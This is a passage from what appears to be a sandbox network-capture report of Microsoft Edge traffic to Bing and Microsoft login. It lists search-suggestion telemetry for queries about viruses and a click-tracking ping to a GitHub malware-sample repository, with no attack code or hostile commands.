19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350647%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=anydde&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=19f223458719487eaf9ca017380efdc9&oit=1&cp=6&pgcl=4
92.123.128.189:443

https://www.bing.com/qbox?query=anydd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=d8ae9d7482524a1a937fe57d0f44779f&oit=1&cp=5&pgcl=4

tls, http

msedge.exe

127.7kB
75.5kB
154
193

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/orgid/idtoken/conditional

HTTP Response

200

HTTP Request

GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruses&cp=12&csr=1&zis=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viruse&cp=11&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20virus&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vir&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20vi&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20v&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336991%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337015%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337052%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ap%2Ci%3A11%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A12%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22699%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A8%2Cig%3AD90AA2D2C3B546C59906675777350E15%22%2C%22AnswerInfo%22%3A%22AS%3B22%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22AsResponseLength%22%3A%22845%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337186%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A10%2Cig%3ABB3C438218B14E40A7C7F8A61F219E36%22%2C%22AnswerInfo%22%3A%22AS%3B4%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337187%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.782b217f9f215eda69d39bcd99b6f8a4&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.4994bc85f5f75906347baaa7c4b91b47&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OIP.ApkJS9QGG_goYQeyHaLw5AHaFj&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vir&cp=3&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.15126b537972a3a4e1e2fd27e67ffd9e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22AsResponseLength%22%3A%22745%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%2Cig%3A63EB1BDA16F34E5CB42DE71DE2763765%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A17%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343300%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343348%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22AsResponseLength%22%3A%22743%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%2Cig%3A79911AD6BC47492BB6CF4680F8D2B7C7%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A18%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343520%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22AsResponseLength%22%3A%22780%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%2Cig%3AEA1BBF1F63C841228939DB8862762F02%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A19%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343744%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343746%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22AsResponseLength%22%3A%22680%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%2Cig%3AA2F430D7A9D44ACD8221E43A24CA79DF%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20g&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20gi&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A21%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144346886%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144346913%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%22%2C%22AsResponseLength%22%3A%22462%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20g%2Ci%3A20%2Cig%3AA08BBAE303D74EACBD5C8B8431B58506%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A22%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144347352%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144347385%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%22%2C%22AsResponseLength%22%3A%22444%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20gi%2Ci%3A21%2Cig%3AACC4C3B51F2946CCA132A82824F773C3%22%2C%22AnswerInfo%22%3A%22LT%3B14%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144347506%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%226.2%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144350030%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144350322%2C%22Name%22%3A375%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350324%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350326%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=1D2FDF991A984BF98138E4B738C9DC15&IID=SERP.5060&q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0

HTTP Response

200

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=1D2FDF991A984BF98138E4B738C9DC15&ID=SERP,5131.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Dviruses%2Bgithub%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM%26ntb%3D1

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=anydd&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=d8ae9d7482524a1a937fe57d0f44779f&oit=1&cp=5&pgcl=4
20.190.160.14:443

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b98085d5-b708-49a2-b00c-6bf09b7226b6&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%221D2FDF991A984BF98138E4B738C9DC15%22%7d

tls, http2

msedge.exe

5.3kB
10.2kB
54
58

HTTP Request

GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b550fbea-11d9-4f6e-a407-8a314d8f6920&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220DD30F05AB304142B388EAD39E0E9879%22%7d

HTTP Response

200

HTTP Request

GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b98085d5-b708-49a2-b00c-6bf09b7226b6&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%221D2FDF991A984BF98138E4B738C9DC15%22%7d

HTTP Response

200
92.123.128.189:443

https://www.bing.com/qbox?query=a&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=076f2260b571409a9f71f37c2377ce59&oit=1&cp=1&pgcl=4

tls, http

msedge.exe

60.6kB
56.7kB
91
114

HTTP Request

GET https://www.bing.com/th?id=OSK.21d2c54a49f9f79cbcf2d1e779ef9258&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.d0a9640d5e07422b93950ecce6a2fae0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viru&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=virus&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.a71ba3e6a5da0f5eee3b1bb25fb7d711&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20github%2Ci%3A23%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144348713%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Autosuggest%22%2C%22TS%22%3A1728144348729%2C%22Name%22%3A%22MouseClick%22%2C%22FID%22%3A%22Suggestion%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:163,%22BC%22:163,%22SE%22:-1,%22TC%22:-1,%22H%22:886,%22BP%22:1041,%22CT%22:1042,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,2043,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144350328%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=1D2FDF991A984BF98138E4B738C9DC15&iid=.5092&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Request

POST https://www.bing.com/orgid/idtoken/conditional

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144350790%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/favicon.ico

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443324%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/qbox?query=a&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=076f2260b571409a9f71f37c2377ce59&oit=1&cp=1&pgcl=4
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=97&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

7.0kB
5.0kB
37
38

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=92&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=97&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=96&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

7.0kB
5.0kB
37
38

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200

HTTP Request

GET https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=96&pcl=fffffa&r=0&o=6&pid=1.2

HTTP Response

200
92.123.128.162:443

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&r=0&o=6&pid=1.2

tls, http

msedge.exe

6.9kB
9.2kB
38
40

HTTP Request

